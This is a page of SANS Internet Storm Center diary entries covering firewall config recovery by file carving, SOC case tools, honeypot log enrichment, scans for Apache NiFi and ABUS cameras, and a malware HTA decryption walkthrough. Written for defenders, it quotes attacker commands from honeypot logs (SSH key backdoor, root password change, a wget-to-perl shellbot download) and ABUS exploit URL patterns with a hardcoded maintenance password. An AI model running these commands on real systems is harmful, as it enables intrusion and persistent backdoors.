SANS


Using DFIR Techniques To Recover From Infrastructure Outages, (Fri, May 26th)
Recently, I was involved in a network outage caused by a defective pfSense firewall appliance. Due to storage issues (with the onboard flash), the firewall did not boot anymore. This can be quickly solved from a hardware point of view because this firewall model has a slot to install an M2-compatible flash device and boot from it. But, there was a problem with the configuration. The last backup they had was pretty old, and they made a lot of changes. No debate about the fact that a robust backup process should have been implemented. Let's focus on the challenge of recovering the last configuration from the firewall. Challenge accepted!
First, I booted the firewall from an emergency USB stick, using serial console access. First tip: always keep your console cables and emergency boot devices in a safe place. Once on the firewall, I tried to access the last configuration (stored as a big XML file) without luck. It was impossible to mount the corrupted filesystem. Because the file system was too big, it was impossible to take an image and store it on a USB key. Let's dump it through the network! I manually configured a NIC to connect to a server and used our best friend: netcat!
# dd if=/dev/mmcsd0 | nc 192.168.254.8 8888
Let's boot a SIFT Workstation to start a listener:
# nc -l -p 8888 >pfsense.raw
After a long time, I had an image of the corrupted file system on a remote host, ready to be investigated. I did not change the default block size ("bs") parameter, to ensure a safe copy and avoid errors.
Now, let's find a way to extract interesting information from the disk image (remember, I need to extract the last configuration). I tried to mount the disk but again, no luck. So I decided to speed up the analysis and try to perform data carving. When data carving is mentioned, many people think about the tool bulk_extractor[1]. This tool tries to find interesting pieces of information from a disk image. It looks for "structured information" (email addresses, credit card numbers, URLs, images, ...). In my case, I was looking for a specific file and decided to use another tool: Scalpel[2]. This one performs file carving operations based on patterns that describe particular files or data fragment "types". You may define these patterns based on fixed strings or regular expressions. The tool is pretty old but you can find any modern file due to its flexible configuration. The good news is that Scalpel is installed on the SIFT Workstation[3]. By default, XML files are not carved. Let's enable this in the configuration file (/etc/scalpel/scalpel.conf). Just add the following line:
xml n 10000000 <?xml </pfsense>
This instructs Scalpel to search for XML files starting with "<?xml" and ending with "</pfsense>" (that's how pfSense configurations are stored). The file size is a maximum of 10M, and the 'n' makes the pattern match case-insensitive.
Now, let's cross our fingers and scan the disk image:
# scalpel -v -c /etc/scalpel/scalpel.conf -o /tmp/carved pfsense.raw
Once the scan is completed, an audit file is generated:
Scalpel version 1.60 audit file
Started at Thu May 22 12:28:06 2023
Command line:
scalpel -c /etc/scalpel/scalpel.conf -o /tmp/carved pfsense.raw
Output directory: /tmp/carved
Configuration file: /etc/scalpel/scalpel.conf
Opening target "H="
The following files were carved:
File          Start      Chop  Length   Extracted From
00000003.xml  156532736  NO    8384365  pfsense.raw
00000002.xml  156368896  NO    8548205  pfsense.raw
00000001.xml  156303360  NO    8613741  pfsense.raw
...
This time, it was successful, and 52 files were carved. Which one is the right configuration? You need to remove the false positives (for example, the smallest files). You can also grep for interesting strings. After a few extra checks, we were confident about the right file. We copied it back to the freshly installed firewall, rebooted, and the system was back alive!
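To make the carving and triage steps concrete, here is an added Python example (not from the diary and not Scalpel's code) that carves header/footer-delimited XML from a raw image the way the scalpel.conf line above describes, then applies the false-positive filtering the diary does by hand: the blob must parse as XML with a <pfsense> root and contain sections a real config has. The disk image, offsets and config contents are constructed.

```python
import re
import xml.etree.ElementTree as ET

# Mirrors the scalpel.conf line: header "<?xml", footer "</pfsense>", 10 MB cap,
# case-insensitive match ('n').
HEADER = b"<?xml"
FOOTER = b"</pfsense>"
MAX_SIZE = 10_000_000


def carve_xml(image, header=HEADER, footer=FOOTER, max_size=MAX_SIZE):
    """Return (offset, blob) for every header that has a footer within max_size.
    Like any header/footer carver this only recovers files stored contiguously;
    a fragmented config would come out truncated or mixed with another file."""
    found = []
    for m in re.finditer(re.escape(header), image, flags=re.IGNORECASE):
        window = image[m.start():m.start() + max_size]
        f = re.search(re.escape(footer), window, flags=re.IGNORECASE)
        if f is None:
            continue
        found.append((m.start(), window[:f.end()]))
    return found


def rank_candidates(blobs, must_contain=(b"<system>", b"<interfaces>")):
    """Drop false positives: keep blobs that are well-formed XML with a <pfsense>
    root and carry sections a real config has. Largest survivor first, since
    older copies are usually the shorter ones."""
    good = []
    for offset, blob in blobs:
        if not all(tag in blob for tag in must_contain):
            continue
        try:
            root = ET.fromstring(blob)
        except ET.ParseError:
            continue  # NUL bytes or a second <?xml inside: two files ran together
        if root.tag != "pfsense":
            continue
        good.append((offset, blob))
    return sorted(good, key=lambda t: len(t[1]), reverse=True)


def build_sample_image():
    """Constructed stand-in for pfsense.raw: filler with a stale config, a
    truncated config and the current config at arbitrary offsets."""
    stale = (b'<?xml version="1.0"?>\n<pfsense><version>21.0</version>'
             b'<system><hostname>fw</hostname></system>'
             b'<interfaces><wan><if>em0</if></wan></interfaces></pfsense>')
    cut = b'<?xml version="1.0"?>\n<pfsense><system><hostname>fw</hostname>'
    current = (b'<?xml version="1.0"?>\n<pfsense><version>23.0</version>'
               b'<system><hostname>fw</hostname></system>'
               b'<interfaces><wan><if>em0</if></wan><lan><if>em1</if></lan></interfaces>'
               b'<filter><rule><descr>mgmt</descr></rule></filter></pfsense>')
    gap = b"\x00" * 512
    return gap + stale + gap + cut + gap + current + gap


def recover_config(image):
    """Best candidate config from the image, or None if nothing survives triage."""
    ranked = rank_candidates(carve_xml(image))
    return ranked[0][1] if ranked else None


if __name__ == "__main__":
    cfg = recover_config(build_sample_image())
    print(cfg.decode() if cfg else "no config found")
```

The truncated copy is carved (its "footer" is the next config's) but rejected at the XML parse, which is exactly the kind of false positive the manual checks in the diary weed out.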
In conclusion, DFIR techniques can be very helpful when your infrastructure is down, but it will cost time (read: money!). The best is, of course, to have a strong backup/restore process.
[1] https://github.com/simsong/bulk_extractor
[2] https://github.com/sleuthkit/scalpel
[3] https://www.sans.org/tools/sift-workstation/
Xavier Mertens (@xme)
Xameco
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key
ISC Stormcast For Friday, May 26th, 2023 https://isc.sans.edu/podcastdetail/8514, (Fri, May 26th)
ISC Stormcast For Thursday, May 25th, 2023 https://isc.sans.edu/podcastdetail/8512, (Thu, May 25th)
IR Case/Alert Management, (Wed, May 24th)
Recently I was discussing alert/case management tools for SOCs, and I started thinking about the key points I use when deciding. Depending on how big your SOC is, you will have different priorities for each point, for example if you have customer SLAs and turnover. But these are the things I look for, in no particular order.
- Open Source
- Alert and Case Management
- Artifact Enhancement
- Playbook/Work Flows
- Metrics
TheHive (1)
This has been my favorite tool for managing cases for a while. In the last year, it has gone to a pay model if you use TheHive version 5. Support for 4 has stopped, but you can still use it. I had a quick look, and I didn't see anyone with a forked version 4 supporting it. Metrics in version 3 could have been better, and in 5 they have improved. It also supports marking cases with ATT&CK techniques. Elastalert has direct support for TheHive, which is an excellent and easy way to get alerts from SecurityOnion into your case system. They use Cortex for enriching artifact information, which has a great plugin architecture. Most people are familiar with TheHive, so I'll skip any screenshots. It's a great project, and if you have the money to allocate, I suggest supporting this project for your SOC.
DFIR-IRIS (2)
It is a robust system that can run in Docker, and the database is Postgres. In the latest revisions, released this month, they added support for alert tracking. Alerts can be fed into the system using its API (no Elastalert support yet). You can easily convert alerts into cases. You can create case templates that contain playbooks for what to do. If you put your information in the right places, the generated report feature produces a very nice, readable report. They currently do not have predefined ATT&CK techniques, but you can tag most items you add to cases. This project is very active and doing a great job adding features. They already have a full demo online to try (3), so go take a look!
Alert queue
The alert queue was added in the latest release. There is an API to get alerts into the system.
Case Management
At the top of the case view is where you access the different parts of the case. Assets are where you list which assets are involved in the incident. Typically with TheHive, I would create a new task per device and put the notes for each compromised asset there. This is a nice feature to quickly see what is involved.
Notes Section
I've only messed around with the demo, but I'm unsure how to use the note section now. You can group things together nicely, but in real cases, I would have to see if the input fields from the tasks were not enough to meet the needs first.
Case Template/Playbooks
Creating templates is easy to do. These end up in the task area of the case, where they can be used to walk the responder through tasks for the case type.
You can add files to the case along with IOCs.
They do have some modules and enrichment, but only a little for now. A 3rd party module by SOCfortress will integrate with Cortex, giving you a ton of flexibility. (4)
There is at least one more alert manager I plan on covering in the future, but let me know what you are using and why you like it in the comments.
(1) https://thehive-project.org/
(3) https://v200.beta.dfir-iris.org/welcome
(4) https://github.com/socfortress/iris-cortexanalyzer-module
--
Tom Webb
@tom_webb@infosec.exchange
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
More Data Enrichment for Cowrie Logs, (Wed, May 24th)
While reviewing cowrie [1] logs from my honeypot [2] and developing my cowrieprocessor python script [3], I've been interested in adding information to understand more about some of the attack sources.
- Are these attacks performed by people behind a keyboard or simply bots on the internet?
- Where are the attacks coming from?
- What infrastructure is being used to initiate the attack?
Through the process of trying to answer some of these questions, I've added several different enrichment options to this script, each used as long as an API key is supplied for it. These include:
- SANS Internet Storm Center (ISC) API for WHOIS data [4]
- Virus Total API for hash lookups of uploaded/submitted files to the honeypot [5]
- URLhaus for malicious IP address data [6]
- SPUR.us for IP enrichment for WHOIS, infrastructure and VPN/proxy data [7]
Figure 1: Example honeypot data with additional SPUR.us enrichment
In addition to the most recent addition of SPUR.us over the last few days, I've also added the "duration" of the attack to my summaries to see if there were any interesting artifacts based on the timespan for the attack. For example, if an attack was being performed by an individual behind a keyboard, I would anticipate the duration to be longer. There were some other possibilities when thinking about a human actor behind a keyboard and what might be seen:
- Longer attack durations
- More use of VPNs or other anonymization services
- Mistyped commands
- Repeated commands back to back
These are just some of my hypotheses, but I figured a bit more data might help me understand this a bit better. Here is one example with data enrichment that now more definitively calls out that this attack might come from a datacenter network.
Session fd5ac84ee8f9
Session Duration 10.40 seconds
Protocol ssh
Username root
Password Admin123$
Timestamp 2023-05-24T06:23:58.906514Z
Source IP Address 142.93.64.69
URLhaus IP Tags
ASNAME DIGITALOCEAN-ASN
ASCOUNTRY US
Total Commands Run 20
SPUR ASN 14061
SPUR ASN Organization DIGITALOCEAN-ASN
SPUR Organization DigitalOcean, LLC
SPUR Infrastructure DATACENTER
SPUR Client Proxies ['SHIFTER_PROXY']
SPUR Risks ['CALLBACK_PROXY']
SPUR Location Clifton, New Jersey, US
------------------- DOWNLOAD DATA -------------------
Download URL
Download SHA-256 Hash a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2
Destination File /root/.ssh/authorized_keys
VT Description Text
VT Threat Classification trojan.shell/linux
VT First Submssion 2018-07-05 12:21:41
VT Malicious Hits 21
Download URL
Download SHA-256 Hash 01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b
Destination File /etc/hosts.deny
VT Description JavaScript
VT Threat Classification
VT First Submssion 2009-03-05 06:45:38
VT Malicious Hits 0
////////////////// COMMANDS ATTEMPTED //////////////////
# cd ~; chattr -ia .ssh; lockr -ia .ssh
# cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
# cat /proc/cpuinfo | grep name | wc -l
# echo "root:J9uoMrirSMHb"|chpasswd|bash
# rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;
# cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'
# free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
# ls -lh $(which ls)
# which ls
# crontab -l
# w
# uname -m
# cat /proc/cpuinfo | grep model | grep name | wc -l
# top
# uname
# uname -a
# whoami
# lscpu | grep Model
# df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
We can also see that the attack duration is 10 seconds, which is short compared to most other attacks. There's also another nearly identical attack, but coming from a VPN. This VPN attack takes about 1.5 times longer, however.
Session 909bea239054
Session Duration 26.73 seconds
Protocol ssh
Username root
Password qwe@1234
Timestamp 2023-05-24T04:41:29.843213Z
Source IP Address 43.154.116.34
URLhaus IP Tags
ASNAME TENCENT-NET-AP-CN Tencent Building, Kejizhongyi Avenue
ASCOUNTRY CN
Total Commands Run 20
SPUR ASN 132203
SPUR ASN Organization Tencent Building, Kejizhongyi Avenue
SPUR Organization 6 COLLYER QUAY
SPUR Risks ['TUNNEL']
SPUR Services ['SSTP', 'OPENVPN']
SPUR Location Central, Central and Western District, HK
SPUR Anonymous Tunnel True
SPUR Tunnel Type VPN
------------------- DOWNLOAD DATA -------------------
Download URL
Download SHA-256 Hash a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2
Destination File /root/.ssh/authorized_keys
VT Description Text
VT Threat Classification trojan.shell/linux
VT First Submssion 2018-07-05 12:21:41
VT Malicious Hits 21
Download URL
Download SHA-256 Hash 01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b
Destination File /etc/hosts.deny
VT Description JavaScript
VT Threat Classification
VT First Submssion 2009-03-05 06:45:38
VT Malicious Hits 0
////////////////// COMMANDS ATTEMPTED //////////////////
# cd ~; chattr -ia .ssh; lockr -ia .ssh
# cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
# cat /proc/cpuinfo | grep name | wc -l
# echo "root:aeUVqyLmI0Sy"|chpasswd|bash
# rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;
# cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'
# free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
# ls -lh $(which ls)
# which ls
# crontab -l
# w
# uname -m
# cat /proc/cpuinfo | grep model | grep name | wc -l
# top
# uname
# uname -a
# whoami
# lscpu | grep Model
# df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
This doesn't say that one is definitely fully automated and the other is a person, but it gives some more data points to compare two identical attacks. When looking at attacks with data being uploaded to or downloaded by the honeypot, we can also get some additional data from those addresses.
Session 8d39860bce79
Protocol ssh
Username root
Password qwerty123456
Timestamp 2023-05-22T16:48:41.724475Z
Source IP Address 45.79.54.105
URLhaus IP Tags
ASNAME LINODE-AP Linode, LLC
ASCOUNTRY US
Total Commands Run 1
SPUR ASN 63949
SPUR ASN Organization Akamai Connected Cloud
SPUR Organization Linode
SPUR Infrastructure DATACENTER
SPUR Client Behaviors ['TOR_PROXY_USER']
SPUR Location Richardson, Texas, US
------------------- DOWNLOAD DATA -------------------
Download URL http[://]103[.]52[.]134[.]51/csx/perlNIK
Download SHA-256 Hash bb4c8ee23103cd57741a1008552dae1038c17c505dd16f80571d795d91892cad
Destination File
VT Description Perl
VT Threat Classification trojan.perl/shellbot
VT First Submssion 2023-05-15 07:28:09
VT Malicious Hits 39
Download Source Address 103.52.134.51
URLhaus IP Tags
ASNAME MCN-BD Kazi Sazzad Hossain TA Millennium Computers & Networking
ASCOUNTRY BD
SPUR ASN 63949
SPUR ASN Organization Akamai Connected Cloud
SPUR Organization Linode
SPUR Infrastructure DATACENTER
SPUR Client Behaviors ['TOR_PROXY_USER']
SPUR Location Richardson, Texas, US
////////////////// COMMANDS ATTEMPTED //////////////////
# wget -qO - 103.52.134.51/csx/perlNIK|perl
In the future I may also add some additional sources such as Shodan [8], but I also want to keep the summaries as short as possible so that they can be quickly reviewed.
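As an added illustration of how the per-session summaries above can be built from raw cowrie output (example code written for this page, not the cowrieprocessor script itself), the following Python groups cowrie JSON-lines events per session, computes the session duration and the "repeated commands back to back" count from the hypotheses list, and leaves a hook where an IP enrichment lookup (SPUR, ISC) plugs in. The log lines, the IP, the enrichment dictionary and the 60-second "long session" threshold are constructed for the example.

```python
import json
from datetime import datetime

# Constructed log lines in cowrie's JSON-lines format (session id, IP, hash and
# timestamps are made up; the field names follow cowrie's event schema).
SAMPLE_LOG = """\
{"eventid":"cowrie.session.connect","timestamp":"2023-05-24T06:23:58.906514Z","session":"deadbeef0001","src_ip":"203.0.113.10","protocol":"ssh"}
{"eventid":"cowrie.login.success","timestamp":"2023-05-24T06:24:00.100000Z","session":"deadbeef0001","username":"root","password":"Admin123$"}
{"eventid":"cowrie.command.input","timestamp":"2023-05-24T06:24:01.000000Z","session":"deadbeef0001","input":"uname -a"}
{"eventid":"cowrie.command.input","timestamp":"2023-05-24T06:24:01.500000Z","session":"deadbeef0001","input":"uname -a"}
{"eventid":"cowrie.command.input","timestamp":"2023-05-24T06:24:03.000000Z","session":"deadbeef0001","input":"crontab -l"}
{"eventid":"cowrie.session.file_download","timestamp":"2023-05-24T06:24:05.000000Z","session":"deadbeef0001","url":"http://203.0.113.99/x.sh","shasum":"0000000000000000000000000000000000000000000000000000000000000000","outfile":"dl/x.sh"}
{"eventid":"cowrie.session.closed","timestamp":"2023-05-24T06:24:09.306514Z","session":"deadbeef0001","duration":10.4}
"""

# Stand-in for what an IP enrichment API (SPUR, ISC) would return; constructed.
CONSTRUCTED_IP_INFO = {
    "203.0.113.10": {"infrastructure": "DATACENTER", "risks": ["CALLBACK_PROXY"]},
}

# Threshold chosen for illustration, not a value from the diary.
LONG_SESSION_SECONDS = 60.0


def parse_ts(ts):
    return datetime.strptime(ts, "%Y-%m-%dT%H:%M:%S.%fZ")


def keyboard_indicators(summary):
    """Hypotheses from the diary that hint at a human behind the keyboard."""
    hints = []
    if summary["duration"] > LONG_SESSION_SECONDS:
        hints.append("long_duration")
    if summary["repeated_back_to_back"] > 0:
        hints.append("repeated_commands")
    if summary.get("enrichment", {}).get("anonymous_tunnel"):
        hints.append("vpn_or_tunnel")
    return hints


def summarize_sessions(log_text, enrich_ip=None):
    """Group cowrie events per session and build one summary dict per session."""
    sessions = {}
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ev = json.loads(line)
        s = sessions.setdefault(ev["session"], {"commands": [], "downloads": [], "ts": []})
        s["ts"].append(parse_ts(ev["timestamp"]))
        eid = ev["eventid"]
        if eid == "cowrie.session.connect":
            s["src_ip"] = ev["src_ip"]
            s["protocol"] = ev.get("protocol")
        elif eid == "cowrie.login.success":
            s["username"] = ev["username"]
            s["password"] = ev["password"]
        elif eid == "cowrie.command.input":
            s["commands"].append(ev["input"])
        elif eid == "cowrie.session.file_download":
            s["downloads"].append({"url": ev.get("url"), "sha256": ev.get("shasum"),
                                   "outfile": ev.get("outfile")})
        elif eid == "cowrie.session.closed":
            s["duration"] = float(ev["duration"])
    out = {}
    for sid, s in sessions.items():
        cmds = s["commands"]
        # Fall back to first/last event spread when no closed event was logged.
        duration = s.get("duration", (max(s["ts"]) - min(s["ts"])).total_seconds())
        summary = {
            "session": sid,
            "src_ip": s.get("src_ip"),
            "protocol": s.get("protocol"),
            "username": s.get("username"),
            "password": s.get("password"),
            "duration": duration,
            "total_commands": len(cmds),
            "repeated_back_to_back": sum(1 for a, b in zip(cmds, cmds[1:]) if a == b),
            "downloads": s["downloads"],
        }
        if enrich_ip is not None and summary["src_ip"]:
            summary["enrichment"] = enrich_ip(summary["src_ip"])
        summary["keyboard_indicators"] = keyboard_indicators(summary)
        out[sid] = summary
    return out


def lookup_constructed(ip):
    """Replace with a real API client; keyed lookup into constructed data here."""
    return CONSTRUCTED_IP_INFO.get(ip, {})


if __name__ == "__main__":
    for s in summarize_sessions(SAMPLE_LOG, enrich_ip=lookup_constructed).values():
        print(json.dumps(s, indent=1))
```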
Let me know if you think there's a good source of data to give more context to these kinds of logs.
[1] https://github.com/cowrie/cowrie
[2] https://github.com/DShield-ISC/dshield
[3] https://github.com/jslagrew/cowrieprocessor
[4] https://isc.sans.edu/api/
[5] https://developers.virustotal.com/reference/overview
[6] https://urlhaus.abuse.ch/
[7] https://spur.us/
[8] https://www.shodan.io/
--
Jesse La Grew
Handler
ISC Stormcast For Wednesday, May 24th, 2023 https://isc.sans.edu/podcastdetail/8510, (Wed, May 24th)
Help us figure this out: Scans for Apache "Nifi", (Tue, May 23rd)
Please let me know if you have any idea what they are trying to do here :)
I noticed today that our honeypots detected a few scans for Apache NiFi. NiFi is a Java-based system that allows for the routing of data. It enables you to select data from a source (say a CSV file) and output it to a database. Numerous sources and destinations are supported. Dataflows are created via a web-based GUI. One critical use case of Apache NiFi is to prepare and import data into machine learning systems.
Today, I noticed a spike in requests for the URL "/nifi", the default URL used for the NiFi GUI.
Almost all the reports come from the same user-agent and IP address:
User-Agent: Go-http-client/1.1
Source IP: 109.207.200.43
The source IP, located in Ukraine, has a history of scanning for various vulnerabilities, but nothing I would attribute to a particular bot. Just "random" URLs like:
- /boaform/admin/formLogin
- blank.org:443
There are a couple of other IPs and User-Agents used to scan for NiFi:
65.154.226.171 - Claiming to use headless Chrome on Linux and Chrome on Windows. Reasonably recent versions, so they may be real user agents.
205.169.39.250 - Claiming to use Chrome, but ancient versions, so I assume these user agents are fake.
Both of these IPs are part of Qwest/CenturyLink/Lumen. 65.154.226.171 at least used to be part of Palo Alto.
But the real question: What are they looking for? Trying to steal data from badly secured NiFi installs? Poisoning ML data? cryptomining... ? There isn't a vulnerability that I would consider, other than bad configurations with no/weak/default passwords.
Let me know if you use NiFi, and if you have an idea what they may be looking for.
---
Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu
ISC Stormcast For Tuesday, May 23rd, 2023 https://isc.sans.edu/podcastdetail/8508, (Tue, May 23rd)
Probes for recent ABUS Security Camera Vulnerability: Attackers keep an eye on everything., (Mon, May 22nd)
ABUS is usually better known for its "old-fashioned" mechanical locks. But as part of its "Industry Solution" portfolio of products, ABUS also offers more high-tech solutions, for example network-connected cameras [1]. Sadly, these cameras suffer from some of the same vulnerabilities as many similar cameras.
In February, Peter Ohm disclosed a vulnerability affecting ABUS cameras on the full disclosure mailing list [2]. The disclosure covers three different vulnerabilities:
1 - Local File Inclusion
This vulnerability can be used to read arbitrary files:
cgi-bin/admin/fileread?READ.filePath=[filename]
2 - Remote command injection vulnerability
/cgi-bin/mft/wireless_mft?ap=irrelevant;[command]
This vulnerability allows for arbitrary command injection. Instead of a semicolon, an attacker could also use a pipe or a carriage return.
3 - Fixed "maintenance" account
The affected cameras use the following credentials for a built-in "maintenance" account.
manufacture erutcafunam
Among these vulnerabilities, the remote command execution vulnerability is the most interesting one. Yesterday, our sensor picked up exploit attempts consistent with this vulnerability:
/cgi-bin/mft/wireless_mft?ap=irrelevant;{payload}
I did not obfuscate the command. The attacker did not correctly expand the command parameter. Maybe they are using a Python "f-string" but forgot the leading "f"?
All the attacks originate from an unconfigured server (45.95.147.229) in the Netherlands. This server has a history of attempts to exploit various common vulnerabilities.
But there is more...
Our web application honeypots have been around for a while, so we have some history to look back at. Similar exploit attempts are going back to 2015:
+------------+--------------------------------------------------------------------+
| date | url |
+------------+--------------------------------------------------------------------+
| 2015-07-12 | /cgi-bin/mft/wireless_mft |
| 2015-07-13 | /cgi-bin/mft/wireless_mft |
| 2015-07-13 | /cgi-bin/mft/wireless_mft?ap=testname;cat%20/var/www/secret.passwd |
| 2021-12-13 | /cgi-bin/mft/wireless_mft?ap=travesti;id |
| 2021-12-13 | /cgi-bin/mft/wireless_mft?ap=travesti;ipconfig |
| 2021-12-17 | /cgi-bin/mft/wireless_mft?ap=travesti;id |
| 2021-12-17 | /cgi-bin/mft/wireless_mft?ap=travesti;ipconfig |
| 2022-01-22 | /cgi-bin/mft/wireless_mft?ap=travesti;id |
| 2022-01-22 | /cgi-bin/mft/wireless_mft?ap=travesti;ipconfig |
| 2023-05-20 | /cgi-bin/mft/wireless_mft |
| 2023-05-21 | /cgi-bin/mft/wireless_mft?ap=irrelevant;{payload} |
+------------+--------------------------------------------------------------------+
Back in 2015, Core Security released a very similar vulnerability in "Air Live" cameras [3][4]. Searching further shows that this vulnerability was also found in Zavio IP cameras in 2013 [5].
So this appears to be one of these all too common "IoT" security issues: the same firmware/hardware is resold under different brands, and one vendor fixing the flaw in no way guarantees that other vendors selling the same equipment will even bother to check whether they are vulnerable as well. ABUS is likely just the sales organization, feeling zero responsibility to check whether what it sells is remotely fit to be connected to a network.
As a user of such a camera, you must ensure that you keep your firmware up to date and avoid exposing these cameras to the internet. And as ABUS puts it: "KEEP AN EYE ON EVERYTHING.", most notably your vendors.
[1] https://mobil.abus.com/usa/Commercial-Security/Industry-solutions/Campus-Security
[2] https://seclists.org/fulldisclosure/2023/Feb/16
[3] https://seclists.org/fulldisclosure/2015/Jul/29
[4] http://camera.airlive.com/
[5] https://www.exploit-db.com/exploits/25815
---
Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu
ISC Stormcast For Monday, May 22nd, 2023 https://isc.sans.edu/podcastdetail/8506, (Mon, May 22nd)
Another Malicious HTA File Analysis - Part 3, (Sun, May 21st)
This is part three of a diary entry series. Part one can be found here and part two can be found here.
We ended with the download of a new payload: a .bat file.
Let's take a look:
That looks like more BASE64 code. Let's check with base64dump.py:
Indeed, we have rather 2 long BASE64 strings. So maybe 2 payloads. Or a payload and a loader.
What do we find after the BASE64 code:
A BAT file with obfuscated commands. A lot of 3 letter strings between exclamation marks (!).
The one circled in red draws my attention: !tHB!. If I remove that string, I end up with .exe.
So I try a sed command to remove all occurrences of 3 characters surrounded by exclamation marks. I do this with the regular expression !...!
The result looks like another PowerShell script:
With more obfuscation: I have to remove string pCpCh too.
And we end up with another PowerShell script. It looks similar to the one we analyzed in part 2: another decryptor.
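The two strip operations described above (the !...! tokens in the BAT stage, the pCpCh filler in the PowerShell stage), followed by locating the long BASE64 strings the way base64dump.py lists them, as an added Python example written for this page, not Didier's tooling. The obfuscated fragment, the key and the IV bytes are constructed; the real sample's content is not reproduced.

```python
import re
import base64

# The diary's sed pattern was !...!; it is tightened here to three alphanumerics so
# that a genuine "!" in a command (cmd.exe delayed-expansion variables such as
# !var!) is not eaten together with its neighbours.
BANG_TOKEN = re.compile(r"![A-Za-z0-9]{3}!")
FILLER = "pCpCh"


def strip_bang_tokens(text):
    """BAT stage: drop every !xyz! token, e.g. 'po!tHB!wershell' -> 'powershell'."""
    return BANG_TOKEN.sub("", text)


def strip_filler(text, filler=FILLER):
    """PowerShell stage: drop the junk string inserted between characters."""
    return text.replace(filler, "")


def deobfuscate_stage(text):
    return strip_filler(strip_bang_tokens(text))


def find_base64_blobs(text, min_len=20):
    """Decode every long base64 run in the cleaned script; with 2 payloads, a key
    and an IV present, base64dump.py would list 4 items. min_len is above 16 so
    identifiers such as FromBase64String are not mistaken for data."""
    blobs = []
    for m in re.finditer(r"[A-Za-z0-9+/]{%d,}={0,2}" % min_len, text):
        try:
            blobs.append(base64.b64decode(m.group(0), validate=True))
        except ValueError:
            continue  # not a multiple of 4 or bad padding: plain text, skip
    return blobs


def build_sample():
    """Constructed obfuscated fragment in the style the diary describes."""
    key = base64.b64encode(b"0123456789abcdef0123456789abcdef").decode()  # made-up key
    iv = base64.b64encode(b"fedcba9876543210").decode()                  # made-up IV
    ps = '$k=[Convert]::FromBase64String("%s");$i=[Convert]::FromBase64String("%s")' % (key, iv)
    ps_obf = FILLER.join(ps)  # filler between every character of the PowerShell
    return 'st!tHB!art po!xQz!wershell!Kp9!.exe -nop -c "%s"' % ps_obf


if __name__ == "__main__":
    clean = deobfuscate_stage(build_sample())
    print(clean)
    for blob in find_base64_blobs(clean):
        print(len(blob), "bytes:", blob)
```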
We are again dealing with AES encryption (1), CBC mode this time (2), the key is BASE64-encoded (3) and the initialisation vector too (4). And there is also GZIP decompression (5).
So let's adapt our decryption script from part 2 a bit:
from Crypto.Cipher import AES
import gzip
from Crypto.Util.Padding import pad, unpad

def Transform(items, options):
    # -p 2 selects the second BASE64 item as ciphertext, anything else the first
    if options.parameter == '2':
        ciphertext = items[1]['content']
    else:
        ciphertext = items[0]['content']
    key = items[2]['content']  # third BASE64 item: the AES key
    iv = items[3]['content']   # fourth BASE64 item: the initialisation vector
    oAES = AES.new(key, AES.MODE_CBC, iv)
    # CBC output is padded to the block size, so strip the padding before decompressing
    cleartext = unpad(oAES.decrypt(ciphertext), AES.block_size)
    transformed = gzip.decompress(cleartext)
    return transformed
There are several differences here: we use CBC mode, we have an initialisation vector (iv), and we have to do unpadding (unpad).
And since we have 2 payloads to decrypt this time, we use myjson-transform.py's option -p (--parameter) to specify which payload we want to decrypt.
If -p is equal to '2', we take the second payload (items[1]), otherwise we take the first payload (items[0]).
This is the output from base64dump.py:
We have our 2 payloads, the key and the iv.
We let base64dump.py produce JSON output and feed this into myjson-transform.py with decrypt-2.py script. As I suspect that this payload will be binary (PE file), I do an ASCII dump (-A) of the decrypted data:
This looks indeed like a PE file. Let's verify with my pecheck.py tool:
